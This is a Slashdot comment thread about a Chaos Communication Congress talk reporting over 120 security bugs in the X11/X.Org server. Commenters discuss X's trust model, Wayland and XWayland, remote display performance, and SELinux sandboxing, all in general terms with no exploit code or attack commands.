×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

X11/X.Org Security In Bad Shape

Soulskill posted about 4 months ago | from the i-blame-the-schools dept.

Security 179

An anonymous reader writes "A presentation at the Chaos Communication Congress explains how X11 Server security with being 'worse than it looks.' The presenter found more than 120 bugs in a few months of security research and is not close to being done in his work. Upstream X.Org developers have begun to call most of his claims valid. The presentation by Ilja van Sprunde is available for streaming."

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

179 comments

Is X security really a problem? (4, Interesting)

Anonymous Coward | about 4 months ago | (#45833311)

Aren't we going to replace it with Wayland or something really soon?

Re:Is X security really a problem? (0)

Anonymous Coward | about 4 months ago | (#45833359)

explains how X11 Server security with being 'worse than it looks.

What the fuck is this even supposed to mean?

XWayland (4, Informative)

tepples (727027) | about 4 months ago | (#45833391)

Every X11 server needs a rendering target. For some X11 servers, this is a video card. For others, it is a virtual frame buffer that gets served through X11VNC or XRDP. And on machines running Wayland, the X11 server will render to the Wayland compositor [freedesktop.org]. Porting an application's GUI toolkit allows the application to bypass XWayland, but not all applications will be ported to Wayland immediately, especially proprietary software no longer under mainstream support and free software without a large enough user base. But once enough applications get ported, the more complex and less security-hardened parts of X11 will be paged in only while an X11 application is updating its window.

Re:XWayland (1)

Anonymous Coward | about 4 months ago | (#45833579)

So, thanks to a gratuitous API change, legacy systems without "Wayland" can no longer support newer versions of software.

Anyway, fine-grained security is overrated. EVERYTHING sufficiently complex will have at least one nasty hole in it, and one or a hundred come to the same thing. Block whole protocols from the unwashed masses, and know that internally you're at the mercy of any sufficiently determined rogue, so Treat Your Friends Well.

Or engage in an endless arms race. That always works out great.

Re:XWayland (2)

tepples (727027) | about 4 months ago | (#45833743)

So, thanks to a gratuitous API change, legacy systems without "Wayland" can no longer support newer versions of software.

GUI toolkits will likely continue to support both X11 and Wayland backends, just as many currently support X11, Win32, and Quartz backends.

Re:XWayland (1)

jbolden (176878) | about 4 months ago | (#45833883)

First off those kits don't run so well under Quartz or Win32 so well. It is off and on but the support is iffy. I suspect that with X11 the support will be better but the feature set of Wayland fits the mainstream GUIs better. So what I would guess is that the X11 version doesn't get maintained much hence buggy, and is slow.

Re: XWayland (0)

Anonymous Coward | about 3 months ago | (#45834153)

While you may be right in general, Qt works splendidly on Win32.

Re: XWayland (2, Interesting)

Anonymous Coward | about 3 months ago | (#45834467)

To my surprise I raise the following question!

The same people who worked on X Org are working on Wayland now!

These people removed a couple of hundret thousands of lines of code from X Org.
They refactored the code.
They cleaned the code.
They think they know what they were doing.

How can we trust them to be sucessful with Wayland ?

Re: XWayland (1)

Anonymous Coward | about 3 months ago | (#45835103)

I'm not a fan of Wayland, but if we assume they are all wonderful, perfect developers, it could be that they inherited the mess that is X, tried to fix it up, and then at some point threw up their hands and said "This shit is just too fucked, we need a full rewrite" - and thus Wayland. I don't think this team is the same group of people that wrote X in the first place.

Re: XWayland (0)

Anonymous Coward | about 3 months ago | (#45835279)

I don't think this team is the same group of people that wrote X in the first place.

Actually, it is, mostly. The people who dislike X the most are the people who have been working on it for the past 25+ years.

Re:XWayland (1)

girlintraining (1395911) | about 4 months ago | (#45833595)

But once enough applications get ported, the more complex and less security-hardened parts of X11 will be paged in only while an X11 application is updating its window.

The flaw in this statement is beyond biblical proportions, and in fact extends into the patently absurd domain of hollywood proportions. It's non-digital counterpart is referenced in #63 of the Evil Overlord List: "Bulk trash will be disposed of in incinerators, not compactors. And they will be kept hot, with none of that nonsense about flames going through accessible tunnels at predictable intervals."

You're suggesting that only having a vulnerability present at certain times mitigates the risk. It does not.

Pushing pixmaps around (2)

tepples (727027) | about 4 months ago | (#45833761)

I intended to emphasize "more complex" rather than "less security-hardened". There's plenty of "more complex" legacy stuff in X11 that almost no modern application uses; most GUi toolkits nowadays just push pixmaps around. The featured article describes the effort to fix the "less security-hardened" part, but the only way to break with "more complex" is to ditch X11 in favor of something that does one thing (push pixmaps around) and does it well. Isn't that what the UNIX philosophy is supposed to be anyway?

Re:Pushing pixmaps around (0, Troll)

girlintraining (1395911) | about 3 months ago | (#45834333)

Isn't that what the UNIX philosophy is supposed to be anyway?

Adherence to a philosophy in the face of more reasonable alternatives is an act of irrationality. Philosophies are meant to guide, not dictate. When a philosophy is elevated to the status of a belief, it ceases being an idea to free us, and instead becomes something to restrict and control us.

The engineer in me says the only "philosophy" one should adopt is the one that leads to the most benefits with the fewest drawbacks. If that requires eschewing the current design paradigm for a different one, than so be it.

Re:Pushing pixmaps around (1)

Anonymous Coward | about 3 months ago | (#45835383)

I am a huge fan of UNIX methodology: do one thing and do it well. It's not just a philosophy, it saves valuable time as a modular design pattern. The problem is defining how big "one thing" can be, as it invariably gets worse as it gets more complex.

Re:Pushing pixmaps around (1)

dbIII (701233) | about 3 months ago | (#45834857)

Yes the brute force approach of pushing pixmaps around which only does it well because ridiculously powerful graphics hardware makes it possible. Meanwhile far less powerful hardware is turning up everywhere and is almost always on a network (eg. congested WiFi) that just does not have the bandwidth to take pixmaps put together by more powerful hardware (and certainly can't do much itself).
This idea of the dumb framebuffer where the application developer has to do a lot of heavy lifting to match the application to display resolution, events etc along with the non-networked approach really does look like a step back into the 1980s to me. The application developers may as well be writing something for a range of video game consoles instead of asking a layer to just put their stuff on the screen and tell it when somebody clicks on it.

RDP and OnLive (2)

tepples (727027) | about 3 months ago | (#45835081)

Meanwhile far less powerful hardware is turning up everywhere and is almost always on a network (eg. congested WiFi) that just does not have the bandwidth to take pixmaps put together by more powerful hardware

Then explain how well RDP has worked usably for me even across the Internet to a PC on what the cable company likes to call "slow DSL from the phone company". Is "congested Wi-Fi" worse than DSL's upstream? And explain how OnLive, Twitch, or any other sort of live streaming video works.

Re:XWayland (1)

Anonymous Coward | about 4 months ago | (#45833605)

Since Wayland is another freedesktop.org project, it will no doubt be integrated into systemd over the next year. What else can be integrated into systemd... how about ssh?

Celestia, of course (0)

Anonymous Coward | about 4 months ago | (#45833829)

Since Wayland is another freedesktop.org project, it will no doubt be integrated into systemd over the next year. What else can be integrated into systemd... how about ssh?

systemd is the best argument yet for legalizing postnatal abortion. I know, let's integrate celestia into systemd!

Re:Celestia, of course (0)

Anonymous Coward | about 3 months ago | (#45835141)

Let's get Eclipse integrated first. Then we can modularize Celestia into an Eclipse plug-in.

Re:XWayland (2)

thegarbz (1787294) | about 3 months ago | (#45833949)

As a matter of interest don't applications just use toolkits like GTK or QT to render an interface? Can't just the toolkits be ported to Wayland with minimal change to the app?

Are we talking about a re-write to make an app Wayland compatible, or a few minor changes and a recompile?

Re:XWayland (1)

tepples (727027) | about 3 months ago | (#45834077)

We're talking about 1. porting the toolkits and 2. porting the applications to the latest versions of the toolkits. Step 2 can be a few minor changes, recompile, and run through the project's acceptance testing procedure. Or it can be far more involved if any of the following are true:
  • The application currently uses a toolkit that won't be ported to Wayland. Among X11 toolkits [wikipedia.org], Qt and GTK+ will be ported, but many others won't.
  • The application currently uses an old major version of a toolkit. Applications that depend on old GTK+ or old Qt will first have to be ported to a version of the toolkit that supports Wayland.
  • The application is proprietary and no longer under mainstream support.

Re:XWayland (1)

F.Ultra (1673484) | about 3 months ago | (#45834373)

Step 2 can also be "do nothing" since the toolkits can implement support for Wayland without changed the major version of the toolkit so the application can link to the very same .so as it did before. Also the user might run XWayland and then even the old X11-only toolkits will work out of the box.

Re:XWayland (1)

tepples (727027) | about 3 months ago | (#45834461)

the toolkits can implement support for Wayland without changed the major version of the toolkit

This is true provided that a particular major version of a toolkit is still in mainstream support. Consider what happens if, for example, GTK+ 3 gets ported to Wayland but GTK+ 2 does not. In that case, GTK+ 2 applications that aren't ported to GTK+ 3 will need to run in XWayland.

Also the user might run XWayland and then even the old X11-only toolkits will work out of the box.

Previous stories about Wayland have attracted comments to the effect "if most of your apps will be running in XWayland, why even switch to Wayland in the first place?" and I was trying to word my comment to avoid the train of thought that leads there.

Re:XWayland (1)

thegarbz (1787294) | about 3 months ago | (#45835237)

Previous stories about Wayland have attracted comments to the effect "if most of your apps will be running in XWayland, why even switch to Wayland in the first place?" and I was trying to word my comment to avoid the train of thought that leads there.

If people don't realise that a sudden system wide change that breaks all applications is bad without an emulation layer for transition I don't think they can meaningfully participate in any conversation about change.

Ask them how they propose the change to IPv6 if they are so clever.

Re:XWayland (2)

dbIII (701233) | about 3 months ago | (#45834811)

That's right. An upgrade from a complex network aware system with lots of places for bugs to hide to a simple dumb framebuffer where there are less places for bugs to hide. That's fine so long as a simple dumb frame is all you need and so long as it doesn't have lots of places to hide in bits designed to do shiny 3D things thrown together quickly without considering security at all.

Come on now people, let's consider this seriously instead of the silly name calling. Who in Wayland is even thinking about doing it as a secure system yet? I hope that's the way it goes but it's not happening this early in the project What is it with all these "X sux for a problem that Wayland hasn't even considered yet but will sort out someday" posts?

Re:Is X security really a problem? (2)

fnj (64210) | about 3 months ago | (#45834533)

Aren't we going to replace it with Wayland or something really soon?

What do you mean "we", kemosabe?

Re:Is X security really a problem? (1)

jhol13 (1087781) | about 3 months ago | (#45834893)

Even if we do, whan on earth makes you think Wayland is even a bit better?

Re: Is X security really a problem? (0)

Anonymous Coward | about 3 months ago | (#45835089)

It new! Its hot! It comes from the Gnome crowd! It requires systemd! Gnome depends on systemd! KDE dependa soon on system! You must have it! Its soo h4wt!

No, Wayland will still take several years (1)

Anonymous Coward | about 3 months ago | (#45835643)

As long as Wayland doesn't support remoting it will not replace anything. Remoting is needed for non-hobbyist heterogenic environments where you will have to be able to "run" Windows applications on *NIX boxes, and vice versa.

(Most of tailored business applications will never run reliably enough with wine. Also, it is often waste of resources to use fat clients where thin would sufficie. Except you can't do thin clients with Wayland...)

Wayland is so far from feature parity that it can be mostly seen as a joke - for corporate environments that is. When it does something like "ssh -X" and "voila, remote application is running", get back to talking about it. Before that stfu.

Hotel 1 Bravo (-1, Offtopic)

rmdingler (1955220) | about 4 months ago | (#45833329)

Did another company draft poorly at the developer position?

Re:Hotel 1 Bravo (2)

DaHat (247651) | about 4 months ago | (#45833491)

Given that X is nearly 30 years old... it sounds more like a number of issues were not considered way back when (trust boundaries for one), and that those same mistakes/assumptions have been carried forward for much of this time.

Re:Hotel 1 Bravo (5, Insightful)

jd (1658) | about 4 months ago | (#45833821)

Some were certainly considered but prohibited by law. Due to crypto export restrictions, it wasn't until the limits on Open Source were loosened that X was legally permitted to have any kind of meaningful security. The non-export version still had to talk to the exportable edition, after all.

Yes, X was (and is) incredibly sloppy by today's standards and yes a lot of that was due to poor decisions in the days of X10. (Yes, boundaries are a decision. MIT could have chosen any sort of access control list system they wanted, with yet another library handling it. You could have then substituted whatever you wanted, so long as the API remained the same. Pretty much futureproof, no significant extra coding, easier to maintain than what they actually did.)

The coding flaws - of which there were many - were often detectable by tools as ancient as lint.

But you must also remember, X10 and X11 were never intended as products. They were reference implementations of a protocol, not finished products intended for actual use. The different vendors were always "supposed" to provide their own.

Re:Hotel 1 Bravo (1)

EvilSS (557649) | about 3 months ago | (#45834927)

Given that X is nearly 30 years old... it sounds more like a number of issues were not considered way back when (trust boundaries for one), and that those same mistakes/assumptions have been carried forward for much of this time.

God I hate that word. If there is one word that I wish I could beat out of every developer, it's "assumption". I know they are necessary to an extent, but man do they come back to bite you in the ass every time...

ANOTHER Phoronix post? (0, Troll)

gcore (748374) | about 4 months ago | (#45833345)

Jesus christ. ANOTHER Phoronix post? Isn't this news for nerds - stuff that MATTERS? Phoronix is a link farm where very few posts matter.

Re:ANOTHER Phoronix post? (1)

Anonymous Coward | about 4 months ago | (#45833369)

You must be new here. Nothing on Slashdot matters, including the people and the comments.

Re:ANOTHER Phoronix post? (0)

epyT-R (613989) | about 3 months ago | (#45834795)

Oh, what are we supposed to care about then? What the masses do? ..and what's that? What's up with the latest dick miley cyrus is fucking?

Re:ANOTHER Phoronix post? (1)

reikae (80981) | about 3 months ago | (#45835525)

You're correct of course, nothing on Earth really matters. We all will die eventually and the whole universe may (will?) be gone one day. Luckily I can mostly forget that and get excited about little things that don't really matter.

Re:ANOTHER Phoronix post? (5, Insightful)

Anaerin (905998) | about 4 months ago | (#45833559)

I'm sorry. You were complaining about a news (Yes, news) story about a talk from CCC (Which is highly popular with, and immensely relevant for, nerds), posted on Phoronix (A website that devotes itself almost entirely to information, news and reviews on hardware and software from a Linux-based perspective), about a lot (120+) of security holes (Things that matter) in the X11/X.org servers (Which are the basis for (almost) all GUI-driven applications in Linux, *BSD and some of OSX).

By my count, that makes this story "News", "For Nerds", and "Stuff that matters". Oh, and the irony in posting that Phoronix is a "Link Farm" on /. is almost entirely palpable.

The process (2)

ebonum (830686) | about 4 months ago | (#45833363)

This is a good thing. This is the way it is supposed to work. This is how things get better. A little late, but it good to see this happening.

Re:The process (4, Insightful)

dasunt (249686) | about 3 months ago | (#45834435)

This is a good thing. This is the way it is supposed to work. This is how things get better. A little late, but it good to see this happening.

No. I think it's time to throw X out. We'll make a new implementation, complete with everything I use (we'll plan to add stuff you want later), with all new code, because new code never has any security holes!

Re:The process (1)

jhol13 (1087781) | about 3 months ago | (#45834887)

I do not believe that (things are getting better).
I would be really surprised if the real number of holes is going down significantly, the developers are making holes at the same time as these guys are finding them. Perhaps this temporarily gets the hole count down, but after five years the situation will be the same.

The OSS "mind" has been, for 20 years, "a fixed hole is a good thing". Why on earth would it suddenly change to "do not make new holes"?

And in a related story, water is wet. (0)

Anonymous Coward | about 4 months ago | (#45833459)

X Windows was never designed with security in mind. The fact that it's insecure is no surprise.

When will Wayland contain this essential feature? (3, Funny)

blackpaw (240313) | about 4 months ago | (#45833507)

Cue hord of posts demanding that Wayland must die as it can never replicate the mass security violations that X11 contains.

Re:When will Wayland contain this essential featur (0)

Anonymous Coward | about 4 months ago | (#45833551)

Cue hords of posts demanding that X11 must die because Wayland does everything better.

Re:When will Wayland contain this essential featur (0)

Anonymous Coward | about 4 months ago | (#45833877)

Cue hords of posts demanding that X11 must die because Wayland does everything better.

What's the point of X12/Wayland if it didn't?

Re:When will Wayland contain this essential featur (0)

Anonymous Coward | about 3 months ago | (#45833923)

What's the point of X12/Wayland if it didn't?

...exactly!

Re:When will Wayland contain this essential featur (0)

Anonymous Coward | about 3 months ago | (#45834909)

"X12/Wayland"

X12 it's not. Wayland is a total re-write. Outside of compatibility shims it's a different design and not X anything. Just call it Wayland and be done with it.

Just look it up people (1)

dbIII (701233) | about 3 months ago | (#45835009)

Apart from the Xorg hardware drivers it's using to blit it's composed framebuffer onto people's screens.
Wayland is a framebuffer compositor designed to replace a few features in X in a new (and incompatible) way in the interests of speed. It still relies on some stuff made for X, and IMHO that's some of the slowest stuff involved in putting things on the screen (eg. gtk), so it will be a bit of a struggle to get an obvious speed benefit unless improvements are made there as well or it gets it's own toolkit (which means it will start to resemble the complexity of X).

Re: Just look it up people (0)

Anonymous Coward | about 3 months ago | (#45835107)

DirectFB already supported the ideology of that. I ran a few apps on it a couple of years ago. Sure it has not the same design as Wayland (does it?) but wasnt that a good base to start with rather than starting from scratch?

Re:When will Wayland contain this essential featur (0)

Anonymous Coward | about 3 months ago | (#45835153)

X12? That's an Electronic Data Interchange standard. Nothing to do with the X Window System.

New PSA poster (1)

CajunArson (465943) | about 4 months ago | (#45833517)

When you use an Insecure X11 Stack...
You are displaying windows WITH THE NSA!

Yet another reason why they need to whip Wayland into shape.

Re: New PSA poster (0)

Anonymous Coward | about 3 months ago | (#45835151)

You are missing an 'A' it has to be 'NASA'.

How badl is the overall architecture? (0)

Anonymous Coward | about 4 months ago | (#45833539)

Could it be time for X12?

Re:How badl is the overall architecture? (1)

jones_supa (887896) | about 3 months ago | (#45834243)

Then we would have X12, Wayland and Mir competing...redundant fragmentation over minor differences.

Re:How badl is the overall architecture? (0)

Anonymous Coward | about 3 months ago | (#45834929)

"Could it be time for X12?"

        It was time for X12 fifteen years ago. What did we get then? And what are we getting now?

Re:How badl is the overall architecture? (0)

Anonymous Coward | about 3 months ago | (#45834949)

"Could it be time for X12?"

        Plan9.

Fucking kill it already (1, Insightful)

ArchieBunker (132337) | about 4 months ago | (#45833585)

X had its day in the sun. I want a responsive and fast GUI with network connectivity being somewhere in 10th place. Make that socket/DRI/whatever they cooked up this year into a module so the rest of us don't suffer.

Re:Fucking kill it already (1)

TheGratefulNet (143330) | about 4 months ago | (#45833731)

if it works, why break or reinvent it?

I've been using X for 25 yrs (or close to it) and it does 99% of what I'd want from a transport/gui/toolkit/windowing system.

vnc works great and its only audio that does not carry over vnc. and I don't care or need that (and there are probably ways around that, too).

we have such fast hardware, I don't get what's wrong with X anymore. even if its 'slow' in code, its not slow in practice!

Re:Fucking kill it already (1)

Anonymous Coward | about 4 months ago | (#45833855)

I would have loved to use X11 over the network daily over the decades. Alas, it hasn't worked out. While XTerm has worked great since the 9600-baud terminal connections, the WiFi latencies kill the responsiveness of Firefox, Evince, Emacs, Eclipse and the like. Since XTerm was always fine, I'm left to think the culprit that killed X was the toolkits (together with the synchronous Xlib) that insist on playing ping-pong with the X server. Thank goodness emacs works perfectly on text terminals.

I don't think the Remote Desktop is progress, but something better needs to come along. The X11 protocol is too low-level and the modern themes do too much pixel-level micromanagement. Options include something like a Qt server coresiding with Wayland with a thin Qt API library linked with the remote client application or a Turing-complete applet sandbox (a la Javascript) where the remote application's GUI library downloads the toolkit to the local Wayland server and does ad hoc communication with the remote client.

Re:Fucking kill it already (1)

epyT-R (613989) | about 3 months ago | (#45834853)

That is a horrible idea.. the last thing we need to do is waste even more performance with useless sandboxing and other jive. There's too much of that going on everywhere else now. Regardless of protocol, having sane toolkits and themes in the first place would go a long way towards making remote desktop quick and responsive even with bad connectivity. This means no stupid pixel shader driven desktops when running in remote mode..

Re:Fucking kill it already (1)

dbIII (701233) | about 3 months ago | (#45835029)

I'm left to think the culprit that killed X was the toolkits

And the idea is for them to still live on in Wayland.
I still don't see anything in Wayland that things like "evas" can't already give us on X (yes I know that "evas" for Wayland is also in progress).

Re:Fucking kill it already (0)

Anonymous Coward | about 3 months ago | (#45833921)

I know this is Slashdot but come on, half the comments are talking about it. RTFS and notice that there's a SECURITY problem! It's NOT working!

Re:Fucking kill it already (2)

smash (1351) | about 3 months ago | (#45835291)

Because it only works for very generous definitions of "works". If you've never used anything else maybe remote X seems like it rocks, but vs. ICA or RDP (even the versions from 1999) its performance is abysmal.

Re:Fucking kill it already (1)

Anonymous Coward | about 4 months ago | (#45833779)

X had its day in the sun. I want a responsive and fast GUI with network connectivity being somewhere in 10th place. Make that socket/DRI/whatever they cooked up this year into a module so the rest of us don't suffer.

X is plenty fast on it's own.

Direct your rant an the Gnome/KDE window-dressing/eye-candy fetishists.

Don't blame the Titanic for the captain running it into the iceberg.

Re:Fucking kill it already (1)

fikx (704101) | about 3 months ago | (#45833907)

You mean the "rest of us" being that minority that doesn't use and/or doesn't understand X11 network functionality?

Re:Fucking kill it already (1)

drinkypoo (153816) | about 3 months ago | (#45833981)

You mean the "rest of us" being that minority that doesn't use and/or doesn't understand X11 network functionality?

Minority? The majority of X11 users will never remote an application.

Re:Fucking kill it already (1)

fikx (704101) | about 3 months ago | (#45834777)

if I count most comments about it, you're out numbered, hence "minority"

Re:Fucking kill it already (1)

dbIII (701233) | about 3 months ago | (#45834899)

Since that minority is huge and includes just about every linux desktop used for work purposes and a pile of MS Windows machines with X to run remote stuff as well I consider it a minority worth listening to.
Ignorance is not a virtue.

Re:Fucking kill it already (1)

epyT-R (613989) | about 3 months ago | (#45834965)

The majority of users never create content either, so should we just get rid of desktops entirely and force developers to use tablets?

Re:Fucking kill it already (2)

smash (1351) | about 3 months ago | (#45835303)

... and remote X sucks balls really bad anyway. It's passable on gigabit ethernet, anything slower than that and it is pretty horrible. Meanwhile, even RDP is usable over 64 kilobit.

Re:Fucking kill it already (1)

Desler (1608317) | about 3 months ago | (#45834737)

You think the majority of users use network transparency? LOL. Most apps can't even support it if the user wanted it.

Re:Fucking kill it already (3, Informative)

fikx (704101) | about 3 months ago | (#45834783)

All X11 apps "support" it...that's the beauty of X11 network functionality: apps don't HAVE to support it, it comes free.

Re:Fucking kill it already (1)

epyT-R (613989) | about 3 months ago | (#45834839)

It does have a responsive and fast response.. It's the bloated toolkits and useless eyecandy rendering engines sitting under it that are the problem.. Turn off the compositor and it responds just fine, even on ancient late 90s hardware.

Slashdot editing in bad shape (1)

wonkey_monkey (2592601) | about 4 months ago | (#45833619)

A presentation at the Chaos Communication Congress explains how X11 Server security with being 'worse than it looks.'

Still, at least you didn't just copy and paste, so points for that.

Broken by design (3, Informative)

Misagon (1135) | about 4 months ago | (#45833635)

It is not the way X works is particularly secure to begin with. Once an app has a connection to the X server, it has full control over the world of window, pixmaps and events on the server including of course all other apps.

Not that I have any faith in Wayland or Mir being any better, its developers coming from the X world in the first place, I am sure that they will make their new shiny systems vulnerable in the same ways.

Re:Broken by design (4, Insightful)

phantomfive (622387) | about 3 months ago | (#45833987)

Doesn't everyone use X over an ssh tunnel anyway? I haven't used a raw X connection in over a decade.....

Re:Broken by design (4, Insightful)

Rich0 (548339) | about 3 months ago | (#45834225)

Doesn't everyone use X over an ssh tunnel anyway? I haven't used a raw X connection in over a decade.....

That doesn't help at all. He's talking about the fact that any X client can obtain information from any other X client on the same server. Tunneling the X clients through ssh doesn't help at all - it just causes the server to make all that information available over ssh.

Granted, the last time I checked linux makes the memory space of every process for any uid available to any other process running under the same uid (unless you're using SELinux). It is just that big unixy trust-everything-local attitude.

Why is this sort of thing bad? Well, now not only can a browser exploit result in a script being able to sniff your keyboard traffic to other tabs in the same browser, it can also sniff your keyboard traffic to every other window on your display, regardless of where those clients are actually running. There are ways to block it, but nobody uses them as they are rather inconvenient (xterm probably still supports it though).

However, until we close the gap of by web browser being able to read my mail directory or modify my .bashrc, I think that X11 vulnerabilities are just the tip of the iceburg.

Re:Broken by design (1)

F.Ultra (1673484) | about 3 months ago | (#45834411)

Granted, the last time I checked linux makes the memory space of every process for any uid available to any other process running under the same uid (unless you're using SELinux). It is just that big unixy trust-everything-local attitude.

Which mainstream OS does this differently? AFAIK this is the way it works in Windows and OSX aswell, unsure about the BSDs though but I wouldn't be surprised if they also do it like this (it would be a pain to use things like strace or shared memory otherwise and the MMU tables would be quite big)

Re:Broken by design (1)

Rich0 (548339) | about 3 months ago | (#45834503)

Granted, the last time I checked linux makes the memory space of every process for any uid available to any other process running under the same uid (unless you're using SELinux). It is just that big unixy trust-everything-local attitude.

Which mainstream OS does this differently?

Linux under SELinux potentially does this different. I guess you could also count Android - as it gives each application a separate uid, though access to the sdcard is all-or-nothing.

However, yes, this is a common vulnerability, and just another reason why the world is crawling with worms.

Re:Broken by design (0)

Anonymous Coward | about 3 months ago | (#45834761)

And who isn't running SELinux yet? I remember working with it about 10 years ago. Now it's so good, I just sit back and watch this [youtube.com] all day.

Re:Broken by design (1)

bill_mcgonigle (4333) | about 3 months ago | (#45834579)

Which mainstream OS does this differently?

When I was reading up about this a few months ago, it was noted that Windows Vista fixed this on the Windows line. So, yeah, even Windows 8 does something better than a GNU/Linux desktop.

The SELinux fix has been roughed out, but it's not very usable and certainly not mainstream.

I was really disappointed to read that Wayland would possibly bolt this on later, but had nothing baked into the core protocol.

Re:Broken by design (1)

MikeBabcock (65886) | about 3 months ago | (#45835443)

Actually, Android comes to mind. Each application is locked in its own little world (except apps from the same developer) and can only talk to other apps via API calls they've previously agreed on or published.

Its actually quite a nice model.

Re:Broken by design (1)

10101001 10101001 (732688) | about 3 months ago | (#45834591)

Granted, the last time I checked linux makes the memory space of every process for any uid available to any other process running under the same uid (unless you're using SELinux). It is just that big unixy trust-everything-local attitude.

Actually, what makes it worse than that is that (1) there are suid X clients which makes for an obvious privilege escalation attack vector though the X server and (2) the X server itself is root which makes the X server a big target. The fact that the presentation spoke repeatedly about how nasty GLX was is only funny to me in a dark way because of just how insecure GPUs seem anyways as they suffer even worse from the "unixy" trust-everything-local attitude. So, while I'd love to hear that he succeeds in his GLX clean ups, I only think that clears one bug hurdle while still leaving (a) OpenGL drivers and (b) potentially hardware GPU memory protection limitations. Screen scrapping at the kernel level seems worse if nothing else because it doesn't require nearly the level of sophistication in actually discovering which window holds what object and then try to grab or trap for passwords or whatever that way.

However, until we close the gap of by web browser being able to read my mail directory or modify my .bashrc, I think that X11 vulnerabilities are just the tip of the iceburg.

Strictly speaking, we already have that capability in SELinux or in AppArmor. The reason it's not really heavily implemented is because you might want your web browser to be able to save a file in your mail directory or overwrite your local .bashrc from a server stored copy somewhere. Meanwhile, sticking all the UI stuff to allow/disallow isn't some magic bullet--Windows NT has a very robust system of protection that does very little because people don't micromanage things. And honestly, the issue isn't that the web browser has access to your mail directory. It's that a nefarious web site may manipulate your web browser to read the mail directory when you don't want it to. If that's really a big enough concern, you can just run the web browser as a different user....so long as the X11 bugs are fixed. :)

Re:Broken by design (2)

Rich0 (548339) | about 3 months ago | (#45834759)

the X server itself is root which makes the X server a big target

Good point. With KMS I'm not quite sure why it still is root, but sure enough mine is...

Strictly speaking, we already have that capability in SELinux or in AppArmor. The reason it's not really heavily implemented is because you might want your web browser to be able to save a file in your mail directory or overwrite your local .bashrc from a server stored copy somewhere. Meanwhile, sticking all the UI stuff to allow/disallow isn't some magic bullet...

Oh, I agree. The problem is that nobody has figured out a good model for app-level security that isn't extremely inconvenient.

However, I still think the status quo is really insecure. The fact that nobody has come up with something that works better doesn't change that. Sure, if your browser doesn't contain an exploit then you don't need the extra security, but if you want security then you really need defense in depth.

I think something that the NSA has recently demonstrated is that a lot of software contains zero-days known to very few. The more defense in depth you have, the harder it is to exploit your systems. If you're relying only on perimeter security then you're up the creek when somebody breaches it. Of course, the fact that they're sticking rootkits in the firmware also points to the fact that you need to control the bootstrap from a known-good state. What we really need is secure boot that starts from a trustworthy FOSS loader implemented in ROM that verifies and proceeds into flash for UEFI, and then verifies/loads the OS. Maybe store the ROM's verification certificate in flash which is protected against writing by a hardware switch (that way you can install your own UEFI and configure its trust settings). Of course, all of this only works if you trust your hardware vendor.

However, this might be a bit of a pipe dream. Linux has had Trusted Grub for eons and who uses that?

Re:Broken by design (0)

Anonymous Coward | about 3 months ago | (#45834905)

Then you don't know much about Wayland, do you? The source and protocol specifications are already there for you to look at, rather than make retarded claims.

Not just X.org (2)

Wonko the Sane (25252) | about 4 months ago | (#45833867)

Based on the Qt team's complete lack of willingness to fix security bugs apparently when you render with Qt, you're rendering with the NSA.

Isn't This The Way? (0)

Anonymous Coward | about 3 months ago | (#45834575)

Isn't this how FOSS is supposed to work?

Now security issues will be examined and fixed.

Re:Isn't This The Way? (0)

Anonymous Coward | about 3 months ago | (#45835319)

Many of X's bugs are actually features and fixing them will break it. So don't mess with the house of cards, and it may all come crashing down.
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...